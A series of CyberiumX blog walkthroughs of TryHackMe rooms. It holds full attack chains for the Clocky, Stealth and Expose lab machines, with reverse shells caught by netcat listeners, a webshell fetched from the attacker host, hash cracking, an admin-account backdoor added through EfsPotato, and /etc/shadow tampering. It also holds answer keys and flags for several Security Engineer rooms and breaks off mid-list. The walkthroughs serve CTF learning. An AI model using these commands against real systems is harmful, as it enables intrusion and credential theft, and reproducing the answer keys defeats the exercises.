Clocky tryhackme walkthrough writeup

TryHackMe- Clocky

Category: TryHackMe

TryHackMe- Clocky

Posted on by CyberiumX

Hello folks,
This blog provides a walkthrough for a newly added machine on TryHackMe called “Clocky”. It has been classified as a Medium-level challenge. It will help you understand how to identify misconfigurations on Linux-based web servers using various penetration testing tools and techniques. Let’s proceed without any delay and begin the penetration process.
You can access the Clocky machine on TryHackMe by clicking here.
First, let’s start the machine by clicking “Start Machine”. We can start scanning the obtained IP using nmap with the help of the following command:

nmap -sC <Machine_IP>

1. nmap

We can see that 4 ports are open i.e. SSH (22) and others are HTTP ports- 80, 8000, and 8080. Also, we have robots.txt available here where 3 disallowed entries are present: *.sql, *.zip, and *.bak. Let’s confirm the same by visiting the robots.txt file using the following URL:

http://<Machine_IP>/robots.txt

We will find the above-mentioned disallowed entries with our first flag.

2. First flag

Now we can use gobuster to identify if there are any files available for these extensions on all HTTP ports. We will find that on port 8000, we have a file name index.zip using the following command:

gobuster dir –url http://<Machine_IP>:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sql,bak,zip -t 50

Let’s download the file by visiting the URL on our browser. We need to decompress the file using the following command:

unzip index.zip

After decompressing the file, we will find 2 files; flag2.txt and app.py. We can first read the contents of the flag2.txt file to get our second flag.

3. flag2

The app.py file is a Python script. This file looks like the server-side code of the web application. After reading the code, we can understand that there are some web pages available on port 8080 such as /administrator, /password_reset, and /forgot_password which are related to authentication functionality.
Let’s explore the web pages one by one. If we go to /administrator page, we will find a login page that requires a username and password. The /forgot_password page requires us to provide a username for which the password reset token is generated whose algorithm is mentioned in the app.py file. From lines 96-98 of app.py, it is mentioned that the token is generated based on username and current date & time (including seconds as well.) To generate a token value, we have to write a code in Python.
After exploring, we wrote a code and uploaded it to our GitHub repository. In the script, we need to mention the username for which we want to generate the password reset token. In the app.py file, we found 4 usernames; clocky_user, administrator, jane, and clarice.
We have to run the script for all the users and after running it, we will find a token value that we can use to reset the password of the administrator user.

4 Got token

Now to reset the password, we need to visit the /password_reset webpage and there we need to provide a parameter called a token after that, we have to paste the obtained token value as follows:

http://<Machine_IP>:8080/password_reset?token=<Token_Value>

We will find that we can successfully reset the password of the administrator user. Now we can visit the /administrator webpage and finally log in as administrator users with the newly updated password. There we will find our third flag.

5. Flag3
 

Getting Foothold on Clocky

On the admin page, we have a functionality to download any file that is hosted on the web server but if we try to download any webpage using the following URL, we get an error saying “Action not permitted”:

http://localhost

We can bypass it by converting some characters to upper case. Also, we saw a database file in app.py named database.sql, so let’s try to download it by providing the following URL to the specified location:

http://Localhost/database.sql

We will find that the file is downloaded successfully. If we open the file we will find the fourth flag.

6. Flag4

If we further read the contents of the database.sql file, we will see that we have a password that we can try for different users to log in. Let’s create a wordlist for usernames and add the previously obtained usernames to the file. We can use this wordlist to perform a password-spraying attack with the help of the hydra tool using the following command:

hydra -L username.txt -p “Obtained_Password” ssh://<Machine_IP> -t 10

We will find that we obtained the SSH password for clarice user.

7. bruteforce

Let’s access the target machine using this credential pair with the help of the following command:

ssh clarice@<Machine_IP>

After logging in to the machine, we will find our fifth flag in the home directory of the clarice user.
 

Privilege Escalation on Clocky

To get root access to the machine, we have to find a way. If we check the contents of our home directory, we will find a folder named app under which we have an .env file. If we check the file, we will find the password for the MySQL database. So, let’s access the database using the following command:

mysql -u clocky_user -p

After running the above command, we will be asked to provide the obtained password. We successfully got access to the MySQL database. Now we can use the following commands to search for databases, tables, and their contents.

show databases;
use mysql;
select * from the user;

After running these commands we got some hashes but these hashes are not the exact password hash. We need to find a way to convert them. After a lot of research, we got to know about a way to get the password hashes of users on MySQL. We need to know the version of the MySQL server for this to work. We can check the same using the following command:

mysql -V

After running the above command, we can see that the version of MySQL is 8.0.34-0ubuntu0.20.04.1.
We found an article where the method to exploit the same is mentioned according to Mysql version 8. We can get the SHA256 hashes for all users using the following command:

SELECT `User`, CONCAT(‘$mysql’,LEFT(authentication_string,6),’*’,INSERT(HEX(SUBSTR(authentication_string,8)),41,0,’*’)) AS hash FROM mysql.user WHERE plugin = ‘caching_sha2_password’ AND authentication_string NOT LIKE ‘%INVALIDSALTANDPASSWORD%’ AND authentication_string !=”;

Now we need to copy each hash and provide the same to hashcat tool to crack them using the following command:

hashcat -m 7401 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -O –session hash.txt

Here the hash mode is MySQL SHA256 hash. After a few minutes, we will find that one of the provided hash is cracked and we can see the clear text password using the following command:

hashcat -m 7401 –show hash.txt

8. roots password

Finally, let’s try this password for the root user and we will find that we are successfully logged in as root user. Now we can read the contents of sixth flag and solve the CTF.

In this machine, we understood the MySQL-related vulnerabilities and used many penetration testing tools like nmap, gobuster, hydra, and hashcat. We hope that the concepts and techniques discussed in this blog have been clear to you.
You can check out our other blogs on TryHackMe rooms here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe- Stealth

Posted on by CyberiumX

Hello folks,
This blog focuses on a medium-level machine called ‘Stealth‘ available on the ‘TryHackMe‘ platform, offering a chance to breach a Windows operating system. This challenge acts as an initial assessment to gauge your proficiency in red teaming abilities. The ‘Stealth‘ machine will test your skill in utilizing Pentesting tools such as Rustscan, Netcat, PowerShell scripts, csc.exe, and more. Let’s begin the penetration testing process promptly without any delay.
You can access the Stealth machine on TryHackMe.
First of all let’s start the machine by clicking on ‘Start Machine’ and after waiting for 3-4 minutes, scan the obtained IP using the tool ‘Rustscan’.

rustscan -a <Machine_IP>

1. Rustscan

After getting the results from Rustscan, we cannot say what services are running on some specific ports. We can run nmap to grab banners related to those ports and get their service versions using the following command:

nmap -sS -sV -p5985,7680,8000,8080,8443,47001,49664-49680 <Machine_IP>

1.1 nmap sv

Getting User Access on Stealth

We have 15 ports open on the target machine where HTTP service is running on 5 ports- 5985, 8000, 8080, 8443 and 47001. Also, in the lab description we are provided with <Machine_IP>:8080 port on which HTTP service is running. So, let’s open our web browser and access the 8080 port.

2. Webpage 1

We have an upload functionality for ‘Powershell Script Analyzer’ on the website. Let’s find a reverse shell script written in powershell language on the internet, change the IP address to our own tun0 IP address and specify an available port.

3. malisous file

Now, we have to upload the script into the functionality provided on the webpage. Before uploading the .ps1 file, we have to start listening using netcat as follows:

nc -nlvp 1337

After uploading the reverse shell script, we have to wait for 3-4 seconds as the script will be analysed on the server and we will get the reverse connection on our netcat listener.

4. Got first access

After waiting, we can see that we got the reverse shell connection as ‘evader’ user. In order to hunt for the user flag, let’s move to ‘C:\Users\evader\Desktop’ and there we will find a file with the name ‘encodedflag’. If we read the file, we can see that the message is encoded with the Base64 encoding algorithm.

5. Encoded flag

We can decode the message using the following command:

echo “<Encoded_message>” | base64 -d

After running the command we will get a hint saying that we have to visit the provided URL in order to get the flag.

6. hint for flag

Let’s visit the provided URL on the browser to get the flag. There is another hint mentioned on the webpage. The hint says that we have to remove the logs from the server for the uploaded files.

7. Another hint

If we go to the web directory located at ‘C:\xampp\htdocs’, we will find an ‘uploads’ directory under which we have a file named ‘log.txt’. Let’s delete the file using the following command:

del log.txt

9. Logfile

After deleting the logs, if we refresh the webpage we will find our user flag. This ensures that we get user level access on the target machine. Now, we have to perform privilege escalation to become Administrator.
 

Privilege Escalation on Stealth

There is a file in the ‘uploads’ directory named ‘vulnerable.ps1’. Let’s try to read the contents of the file using the ‘type’ command.

10. vulnerable ps1 file

We can see that the contents of this file will help us to get the reverse shell access of the same user. Let’s copy the contents of this file and open another terminal on our machine and create a file with the same name and paste the contents. We have to replace the IP address with our tun0 IP and mention an available port number.
Now, we have to upload the modified vulnerable.ps1 file to the web server which will override the original file with the new one. Now we can simply start the listening using netcat and execute the script with the help of following commands:

On our machine: nc -nlvp 1234
On target machine: ./vulnerable.ps1

We can see that we got a reverse shell on the netcat listener.

11. got another shell

We have to check our privilege as evader user on this shell for which we can use the following command:

whoami /priv

The mentioned privileges are not vulnerable and we cannot take advantages of them. We can use any privilege escalation script to identify different ways to become Administrator/System user on this machine. We have a script written in powershell scripting language called ‘PrivescCheck’. Let’s download it from Github and upload it through the file upload functionality available on the website.
Now let’s execute the script using the following command mentioned on the GitHub repository:

powershell -ep bypass -c “. .\PrivescCheck.ps1; Invoke-PrivescCheck”

It will take a minute to generate the output.

12.priv esc vuln

If we check under ‘Service Binary permissions’ section, we will find that evader user has full permissions on Apache2.4 service and can take full access as ‘Evader’ user on this machine.
We can use ‘P0wny Shell‘ here. Let’s download it on our machine from Github and then upload it on target machine by creating a python3 web server using following command:

python3 -m http.server 7777

Now on target machine use the following command to download the malicious script at ‘c:\xampp\htdocs’ directory:

wget http://<Your_IP>:7777/p0wny.php -o p0wny.php

13. uploading p0wny shell

We will find the malicious file is downloaded and now can be executed from the website using our web browser. Make a request to the following URL:

http://<Machine_IP>:8080/p0wny.php

This is to execute the malicious webshell and provide us the reverse shell of the target website. Now we can check our level of privilege on the target machine using following command:

whoami /priv

14. got shell on web

In the output, we can see that we have a vulnerable privilege available ‘SeImpersonatePrivilege’ which can be exploited with the help of EfsPotato.
In this GitHub repository, we have a ‘.cs’ file which we have to compile on our target machine. Let download this file on our Kali machine and then run python3 web server to host the file so that we can share the file with our target machine using following command:

wget http://<Your_IP>:7777/EfsPotato.cs -o EfsPotato.cs

15. efs file download

After downloading the file, we have to compile this file into an exe file using the commands available on the same GitHub repository. But before it, we have to find the version of Microsoft.NET framework version so that we can use a C# compiler called csc.exe to compile the .cs file and produce an executable (.exe) file.
If we try to change the directory to ‘C:\Windows\Microsoft.NET\framework’, we will find the version of it. The version is ‘v4.0.30319’. Now we have to go back to ‘C:\xampp\htdocs’ directory and type the following command in order to compile the file:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

16. efs file created

If we check our current directory, we will find a new exe file which is created ‘EfsPotato.exe’. Finally, we need to use this binary and try to execute commands as ‘System’ user. Let’s try to run the following command to confirm the same:

EfsPotato.exe “whoami”

We will find that we are running these commands as ‘System’ user. Great! Now we need to find a way to become Administrator. We can use some commands which will allow us to create a new user on the machine and add that user to ‘administrators’ group so that we can gain access to the machine using RDP and then access any binary as administrator user. We have to use a command as follows:

EfsPotato.exe “cmd.exe /c net user CyberiumX Password@123 /add && net localgroup administrators CyberiumX /add”

where, ‘CyberiumX’ is the name of the user and ‘Password@123’ is the login password for this user.

Note- The target windows has a policy build which only allows strong passwords which contains uppercase, lowercase, special characters and numbers.

17. created a user

We will find that the command is executed successfully. Now let’s try to login on the target machine with ‘CyberiumX’ user as the RDP port (3389) is open on the target machine. We can use the following command to get graphical access on the machine:

xfreerdp /v:<Machine_IP> /u:CyberiumX /p:Password@123 /workarea /smart-sizing

After getting access to the machine, we can execute Command Prompt using the ‘Administrator’ user as we are a part of the administrators group. After getting the administrator shell we can move to ‘C:\Users\Administrator\Desktop’ location and read the contents of the flag.

18. got administrator

We have successfully compromised the Stealth machine of TryHackMe.
In this CTF, we learned about some new concepts for getting access using different powershell scripts. You can check out our other blogs for compromising Windows machines on CyberiumX.

 

Happy Pentesting!!!

Team CyberiumX

TryHackMe- Expose

Posted on by CyberiumX

Hello folks,
This blog centers around a beginner-level machine named ‘Expose‘ on the ‘TryHackMe‘ platform, which presents an opportunity to infiltrate a Linux system. This challenge serves as an initial evaluation to measure your competence in the realm of red teaming skills. The ‘Expose‘ machine will assess your aptitude in employing Pentesting tools like Nmap, Rustscan, Gobuster, Sqlmap, Netcat, webshells and various others. Let’s not waste any time and kickstart the penetration testing journey without delay.

You can access the Expose machine on TryHackMe by clicking here.
First of all let’s start the machine by clicking on “Start Machine”.

Scan the obtained IP using tool “NMAP”.

nmap -sV <Machine_IP>

1
We have identified three accessible ports on this machine: 21 (FTP), 22 (SSH) and 53 (DNS). This configuration seems unusual, prompting us to initiate an extensive port scan using Nmap. However, due to the lengthy wait for Nmap results, we opted for a quicker alternative and employed Rustscan using the following command:

rustscan -a <Machine_IP>

2
We got two additional open ports here i.e. 1337 and 1883. Now we can use nmap to specifically scan these two ports with the help of following command:

nmap -p1337,1883 -sV <Machine_IP>

3. nmap 1337
So, we have a web service running on TCP 1337 and mosquito service running on TCP 1883. Now let’s try to access the web page on 1337 port.
Also, let us fire-up Gobuster to perform directory busting on the web server using the following command:

gobuster dir -u http:// <Machine_IP>:1337 -w /usr/share/wordlists/dirb/big.txt -t 50

5. Gobuster

Getting Foothold on Expose

Among the pages we’ve discovered, /admin_101 stands out as particularly promising as there is already a default email address pre-populated in the Email field.

6. login page

Our objective is to pinpoint any authentication related vulnerabilities. To achieve this, we’ll employ sqlmap with a POST request, requiring us to activate Burp Suite. Through Burp Suite, we’ll send the POST request with an arbitrary password while proxying the request.
7. Burp request
We can simply copy the request and paste it in any file (req) and finally supply the same file to sqlmap with the help of following command:

sqlmap –r req –dump

8. sqlmap output

At this point, we can effortlessly copy the password associated with the user whose email is hacker@root.thm and access the /admin_101 page. However, upon accessing the webpage, we did not discover any valuable information.

9. logged in

Returning to the output provided by sqlmap, we observe the presence of additional webpages. Upon attempting to access these pages, we are prompted to input the password we have already successfully cracked.10. file1010111 password
Let’s provide the password and submit it. After that we are getting a line which looks like a hint. It says something related to parameters and also something is hidden.
11. hint for parameter fuzz
We can examine the page’s source code to search for any concealed elements. Our inspection yielded a discovery related to a ‘file‘ parameter that bears a resemblance to a GET parameter.
12. source code for hint
Considering the existence of a parameter named ‘file‘ it’s plausible to explore the possibility of exploiting a directory traversal vulnerability to access internal system files. To initiate this, I supplied the fundamental sequence for a directory traversal vulnerability as outlined below:

?file=../../../../../../etc/passwd

And boom we got the contents of passwd file in the response from the server.

13. Got Dir traversal

We’ve identified a user with a username commencing with the letter ‘z‘ which corresponds to the hint obtained from sqlmap’s output. Consequently, we’ll proceed to access the second webpage located at /upload-cv00101011/index.php and submit the username of the user that starts with ‘z‘.
14. Upload page access
On this page, there’s an upload feature that presents an opportunity to upload a PHP-based webshell, enabling us to establish a foothold on the machine. However, upon inspecting the source code of the upload page, we noticed the presence of a client-side filter, restricting us to uploading only PNG or JPG files.
15. jpg and png allowed
We possess various techniques to circumvent this restriction. Initially, let’s configure our PHP webshell, sourced from pentestmonkey. This entails substituting the IP address with our own tunnel IP and specifying the desired listening port.
16. Change IP for rev shell
Now we can simply rename our webshell and change the extension from php to php.jpg with the help of following command:

mv php-reverse-shell.php php-reverse-shell.php.jpg

17. rename revshell
Following the configuration of our webshell, the next step involves intercepting the request using Burp Suite and attempting to upload our webshell via the upload portal. While the request is intercepted in Burp Suite, we’ll modify the file extension back to ‘php‘. Once this adjustment is made, we can proceed to forward the request, resulting in the successful upload of the file.

18. removed jpg

Now we need to find the web page where all the uploaded files can be accessed. There is again a hidden content in the source code of the page which provides the path of upload page.
20. Upload folder
Let’s go to that page and we will find our file uploaded there with the proper extension as php.
Now before executing the file, we need to start listening on same mentioned port using netcat as follows:

nc -nlvp 1234

After this, as soon as we execute our webshell, we will get the reverse connection back on our kali machine.
22. Got rev shell
Great!!! We got the foothold on Expose machine.
Let’s go to the /home directory and try to access the home directory of the user whose username starts with z. We will find 2 files with name flag.txt and ssh_creds.txt. If we try to access the flag, we are getting permission denied error. So I tried to access the second file and got password for the user.
23. Got ssh pass for zeamkish
Now as we have the password for the user so we can simply login using ssh with the help of following command:

ssh <username>@<Machine_IP>

24. Got access using sshWe can simply read the user flag now.
 

Privilege Escalation on Expose

Now we need to perform privilege escalation to become root user. So for that we have to try many methods out of which SUID bit method looks promising. We can use the following command for that:

find / -type f -perm -u=s 2>/dev/null

25. Got user and priv ecs
The output is very vast but we got 2 binaries which will help us to get root access i.e. find and nano. We have to perform with nano by changing the password of root user from shadow file. But in order to escalate privilege with this method, we need to create a password hash for which we can use mkpasswd command as follows:

mkpasswd -m sha-512 CyberiumX

Here, CyberiumX is the password that I want to set for root user.
26. mkpasswd
Now we can simply edit the /etc/shadow file with the help of nano binary and replace the original password of root with the password generated by mkpasswd tool.
27. Edit etc shadown file
Lastly, we just need to enter the ‘su‘ command, which will request the password for accessing the root user. By entering ‘CyberiumX‘ as the password, we successfully gained root access to the Expose machine. With this privileged access, we can effortlessly retrieve the root flag.
28. Got root access
In summary, this machine provided us with valuable insights into the usage of prominent tools such as nmap, sqlmap, Burp Suite, gobuster and mkpasswd. I trust that the concepts discussed in this blog have been cleared to you.
You can check out our other blogs on TryHackMe rooms here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers- Cyber Crisis Management

Posted on by CyberiumX

Hello folks,
In this write up, we will provide the answers of the Cyber Crisis Management room which is a part of the Security Engineer learning path under the Managing Incidents section. This is freely accessible to all the users of TryHackMe. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

In this room, we will learn about crisis management and how the Crisis Management Team (CMT) can take charge to help steer the organization safely out of a cyber crisis.

I am ready to learn about cyber crisis management!
No answer required
 

Task 2- What is a Cyber Crisis

In this task, you will learn about Cyber Crisis, Crisis Management Team (CMT) and levels of CMT.

Q 2.1- What would the severity rating of an incident be where multiple users are affected and the impact is medium?
A 2.1- Moderate

Q 2.2- What would the severity rating of an incident be where multiple users are affected and the impact is low?
A 2.2- Low

Q 2.3- What would the severity rating of an incident be where an entire business unit is affected and the impact is high?
A 2.3- Critical
 

Task 3- The Roles and Responsibilities in a CMT

In this task, you will learn about the working of CMT, their roles and responsibilities.

Q 3.1- Who is responsible for note-taking in the CMT?
A 3.1- Scribe

Q 3.2- Who is responsible for leading the CMT session?
A 3.2- Chair

Q 3.3- Who is responsible for ensuring that the actions taken by the CMT do not break the law?
A 3.3- Legal

Q 3.4- Who is responsible for making sure that the stakeholders are informed during the CMT?
A 3.4- Communication

Q 3.5- Who is responsible for providing more technical information to the CMT to ensure that they can take the appropriate actions?
A 3.5- Subject Matter Experts
 

Task 4- The Golden Hour

In this task, you will learn how to handle the first hour when CMT is invoked.

Q 4.1- What is the first step that has to be performed during the CMT golden hour?
A 4.1- Assembly

Q 4.2- In the event of a cyber crisis, who provides the update to the CMT?
A 4.2- CSIRT
 

Task 5- The CMT Process

In this task, you will learn about the six step process of CMT which involves The Golden Hour, Information Update, Triage, Action Discussion, Action Approval and Documentation & Crisis Closure.

Q 5.1- What is the term used to describe the process by which the CMT determines the severity of the crisis?
A 5.1- Triage

Q 5.2- Who is ultimately responsible for ensuring that the CMT takes action?
A 5.2- CMT Chair

Q 5.3- Who will ultimately be held accountable for the crisis?
A 5.3-CEO
 

Task 6- The Importance of SMEs

In this task, you will learn about the importance of Subject Matter Experts (SME) and their actions in resolving the crisis.

Q 6.1- Who is responsible for providing the CMT with technical and in-depth information to allow them to make an informed decision during the crisis?
A 6.1- Subject Matter Experts
 

Task 7- The Actions Available to the CMT

In this task, you will learn about the actions that will help the CMT.

Q 7.1 What is the value of the flag you receive after successfully dealing with the cyber crisis?
A 7.2- THM{The.Crisis.has.been.managed!}

We will be providing the answers for the Security Engineer Learning Path. If you need an explanation to these answers, please comment below and we will provide the explanation as per request.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Becoming A First Responder

Posted on by CyberiumX

Hello folks,
In this write up, we will provide the answers of Becoming a First Responder room which is a part of the Security Engineer learning path under Managing Incidents section. This is freely accessible to all the users of TryHackMe. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

This task will introduce the Prerequisites and Learning Objectives of this room.

I am ready to learn about becoming a first responder!
No answer required
 

Task 2- Preservation of Evidence

This task will introduce you to Volatility of Evidence, its order and Chain of Custody.

Q 2.1- What priority order for preservation (number only) is given for the Disk?
A 2.1- 4

Q 2.2- What priority order for preservation (number only) is given for Archival Media?
A 2.2- 7

Q 2.3- What priority order for preservation (number only) is given for the Register and Cache?
A 2.3- 1

Q 2.4- What is the term used to describe ensuring that evidence can be used in legal proceedings?
A 2.4- Chain of Custody
 

Task 3- Alerting the Relevant Stakeholders

This task will introduce you to Incident playbooks, call trees and the responsibility of the First Responder.

Q 3.1- What is the term that describes a defined process that the blue team follows during an incident?
A 3.1- Playbook

Q 3.2- What is the term that describes the structure used to inform all the relevant parties about the incident?
A 3.2- Call Tree
 

Task 4- Isolation of the Incident

This task will introduce you to the importance of Containment, its methods and the responsibility of the First Responder.

Q 4.1- What containment method can be performed remotely using the EDR?
A 4.1- Virtual Isolation

Q 4.2- What containment method requires the blue team to collect the infected host?
A 4.2- Physical Isolation

Q 4.3- What containment method aims to ensure that the infected host cannot communicate with other hosts?
A 4.3- Network Segmentation
 

Task 5- Business Continuity Plan

This task will introduce you to DRP (Disaster Recovery Plan), BCP (Business Continuity Plan) and its Metrics.

Q 5.1- What does BCP stand for?
A 5.1- Business Continuity Plan

Q 5.2- What does DRP stand for?
A 5.2- Disaster Recovery Plan

Q 5.3- What BCP metric is used to describe the amount of time required to recover the hardware of our system?
A 5.3- Recovery Time Objective

Q 5.4- What BCP metric is used to describe the average amount of time required to recover our system?
A 5.4- Mean Time to Repair
 

Task 6- Documentation of Actions

This task will introduce you to the importance of Documentation and its templates.

Q 6.1- What time format should be used in our incident notes to ensure that all times match?
A 6.1- UTC
 

Task 7- Handing Over

This task will help you to practise what you have learned so far. You can launch the static site and practise your understanding.

Q 7.1 What is the value of the flag you receive after responding to the incident?
A 7.2- THM{I.am.ready.to.become.a.first.responder}

We will be providing the answers for the Security Engineer Learning Path. If you need the explanation to these answers, please comment below and we will provide the explanation as per request.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers- Logging for Accountability

Posted on by CyberiumX

Hello folks,
In this write up, we will provide the answers of Logging for Accountability room which is a part of Security Engineer learning path under Managing Incidents section. This is freely accessible to all the users of TryHackMe. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

This task will provide you Learning Objectives and Prerequisites for completing this room.

Read the above before continuing to the next task.
No answer required
 

Task 2- Importance of Logging and Data Aggregation

In this task, we will understand about Security Information and Event Management system (SIEM) and its benefits.

Q 2.1- A user being held accountable for their actions, as proven by logs, is known as what?
A 2.1- Non-Repudiation
 

Task 3- Log Ingestion and Storage

In this task, we will learn about the components of SIEM such as Search Head, Indexer and Forwarder.

Q 3.1- What component of an SIEM is responsible for searching data?
A 3.1- Search head

Q 3.2- How many years must all audit data be stored to be PCI DSS compliant?
A 3.2- 1
 

Task 4- Types of Logs and Data Sources

In this task, we will understand about the types of log sources such as Manual, automated and other types of log sources.

Q 4.1- A change log is an example of what log source?
A 4.1- Manual

Q 4.2- An application log is an example of what log source?
A 4.2- Automated
 

Task 5- Using Logs Effectively

In this task, we will learn about how to perform logging effectively.

Q 5.1- What is the process of using multiple log types and sources as part of incident response formally known as?
A 5.1- Correlation
 

Task 6- Improving Incident Response with Accountability

In this task, we will perform the log analysis using Splunk.

Q 6.1- How many total events are indexed by Splunk?
1
A 6.1- 12,256

Q 6.2- How many events were indexed from April 15th to 16th 2022?
2
A 6.2- 12,250

Q 6.3- How many unique users appear in the data set?
3
A 6.3- 4

Q 6.4- How many events are associated with the user James”?
4
A 6.4- 5

Q 6.5- What utility was used in the oldest event associated with “James”?
5
A 6.5- WMIC

Q 6.6- What event ID followed process creation events associated with “James”?
6 1
A 6.6- 3

We will be providing the answers for Security Engineer Learning Path. If you need the explanation to these answers, please comment below and we will provide the explanation as per request.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For The Intro To IR And IM

Posted on by CyberiumX

Hello folks,
In this write up, we will provide the answers of Intro to IR and IM room which is a part of Security Engineer learning path under Managing Incidents. This is accessible to TryHackMe subscribers only. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

This task will let you know the learning objectives and prerequisites of this room.

I am ready to learn about Incident Response and Incident Management!
No answer required
 

Task 2- What is Incident Response and Management

In this task, you will learn about Cyber Incident, Incident response, Incident Management and different Levels of Incidents Response and Management.

Q 2.1- At what level (number only) of an incident would the SOC be placed at high alert and to deal with an incident?
A 2.1- 3

Q 2.2- At what level (number only) of an incident would it be classified as a cyber crisis?
A 2.2- 4

Q 2.3 Which component (IR or IM) is responsible for trying to answer the question: How do we respond to what happened?
A 2.3- IM

Q 2.4 Which component (IR or IM) is responsible for trying to answer the question: What happened?
A 2.4- IR
 

Task 3- The Different Roles During an Incident

In this task, you will learn about different roles during an Incident Response and Incident Management such as SOC Analyst, SOC Lead, Forensic Analyst, Threat Hunter, Security Engineer, etc.

Q 3.1- What is the value of the flag you receive after matching the roles and responsibilities?
A 3.1- THM{Roles.and.Responsibilities.of.IR.and>IM}
 

Task 4- The Process of Incident Management

In this task, you will understand the four step process of Incident Management which is Preparation, Detection and Analysis, Containment, Eradication, and Recovery and Post-Incident Activity.

Q 4.1- What is the value of the flag you receive after correctly matching the steps of the incident management process?
A 4.1- THM{Preparation.is.Key.for.Incident.Management}
 

Task 5- Common Pitfalls During an Incident

In this task, you will learn about some common pitfalls during Incident Response and Management such as Insufficient Hardening, Insufficient Logging, Insufficient- and Over-Alerting, Insufficient Backups and Insufficient Determination of Incident Scope

Q 5.1- What is the value of the flag you receive when you overcome the common pitfalls of a cyber incident?
A 5.1- THM{Avoiding.the.Common.IM.Mistakes}

Please comment below if you want to get the detailed write up of this room.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For The Governance & Regulation

Posted on by CyberiumX

Hello folks,

In this write up, we will provide the answers of the Governance & Regulation room which is a part of the Security Engineer learning path under Threats and Risks. This is accessible to TryHackMe subscribers only. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.

You can access the room by clicking here.
 

Task 1 Introduction

This task will let you know the learning objectives and prerequisites of this room.

I am ready to start the room.
No answer required
 

Task 2 Why is it important?

In this task, you will learn about some important terminologies like Governance, Compliance and Regulation and relevant Laws.

Q 2.1- The term used for legal and regulatory frameworks that govern the use and protection of information assets is called?
A 2.1- Regulation

Q 2.2- Health Insurance Portability and Accountability Act (HIPAA) targets which domain for data protection?
A 2.2- Healthcare
 

Task 3 Information Security Frameworks

In this task, you will understand Information Security Frameworks which includes Policies, Standards, Guidelines, Procedures and Baselines and also, how to develop Governance documents.

Q 3.1- The step that involves periodic evaluation of policies and making changes as per stakeholder’s input is called?
A 3.1- Review and update

Q 3.2- A set of specific steps for undertaking a particular task or process is called?
A 3.2- Procedure
 

Task 4 Governance Risk and Compliance (GRC)

In this task, you will understand the Governance and Risk Compliance (GRC) framework and its components. Also, you will learn about the guidelines for developing GRC programs.

Q 4.1- What is the component in the GRC framework involved in identifying, assessing, and prioritising risks to the organisation?
A- 4.1- Risk Management

Q 4.2- Is it important to monitor and measure the performance of a developed policy? (yea/nay)
A 4.2- Yea
 

Task 5 Privacy and Data Protection

In this task, you will understand the concept of Privacy and Data protection using General Data Protection Regulation (GDPR)and Payment Card Industry Data Security Standard (PCI DSS).

Q 5.1- What is the maximum fine for Tier 1 users as per GDPR (in terms of percentage)?
A 5.1- 4

Q 5.2- In terms of PCI DSS, what does CHD stand for?
A 5.2- Cardholder Data
 

Task 6 NIST Special Publications

In this task, you will get an understanding of NIST Special Publications such as NIST 800-53 and NIST 800-63B.

Q 6.1- Per NIST 800-53, in which control category does the media protection lie?
A 6.1- Physical

Q 6.2- Per NIST 800-53, in which control category does the incident response lie?
A 6.2- Administrative

Q 6.3- Which phase (name) of NIST 800-53 compliance best practices results in correlating identified assets and permissions?
A 6.3- Map
 

Task 7 Information Security Management and Compliance

In this task, you will get an understanding of Information Security Management and Compliance such as ISO/IEC 27001 and Service Organisation Control 2 (SOC 2)

Q 7.1- Which ISO/IEC 27001 component involves selecting and implementing controls to reduce the identified risks to an acceptable level?
A 7.1- Risk treatment

Q 7.2- In SOC 2 generic controls, which control shows that the system remains available?
A 7.2- Availability
 

Task 8 Conclusion

Q 8.1- What is the flag after completing the exercise?
A 8.2- THM{SECURE_1001}

Please do comment below if you want to get the detailed write up of this room.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For The Threat Modelling

Posted on by CyberiumX

Hello folks,
In this write up, we will provide the answers of Threat Modelling room which is a part of Security Engineer learning path under Threats and Risks section. This is freely accessible to all the users of TryHackMe. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

This task will let you know the learning objectives and prerequisites of this room.

Let’s start modelling threats!
No answer required
 

Task 2- Threat Modelling Overview

This task will explain the difference between threat, risk and vulnerability, process of threat modelling and will help us understand the role and purpose of different teams in an organization.

Q 2.1- What is a weakness or flaw in a system, application, or process that can be exploited by a threat?
A 2.1- Vulnerability

Q 2.2- Based on the provided high-level methodology, what is the process of developing diagrams to visualise the organisation’s architecture and dependencies?
A 2.2- Asset Identification

Q 2.3- What diagram describes and analyses potential threats against a system or application?
A 2.3- Attack Tree
 

Task 3- Modelling with MITRE ATT&CK

This task will help you understand the concepts of MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework and how can we apply and utilise this framework in Threat Modelling Process.

Q 3.1- What is the technique ID of “Exploit Public-Facing Application”?
A 3.1- T1190

Q 3.2- Under what tactic does this technique belong?
A 3.2- Initial Access
 

Task 4- Mapping with ATT&CK Navigator

In this task you will learn about the famous open-source tool called ATT&CK Navigator which helps the security teams to determine matrices based on threat scenario.

Q 4.1- How many MITRE ATT&CK techniques are attributed to APT33?

Threat Modelling

A 4.1- 31

Q 4.2- Upon applying the IaaS platform filter, how many techniques are under the Discovery tactic?

Threat Modelling

A 4.2- 13
 

Task 5- DREAD Framework

In this task you will understand what is DREAD (Damage, Reproducibility, Exploitability, Affected Users and Discoverability) framework and its guidelines for qualitative Risk Analysis.

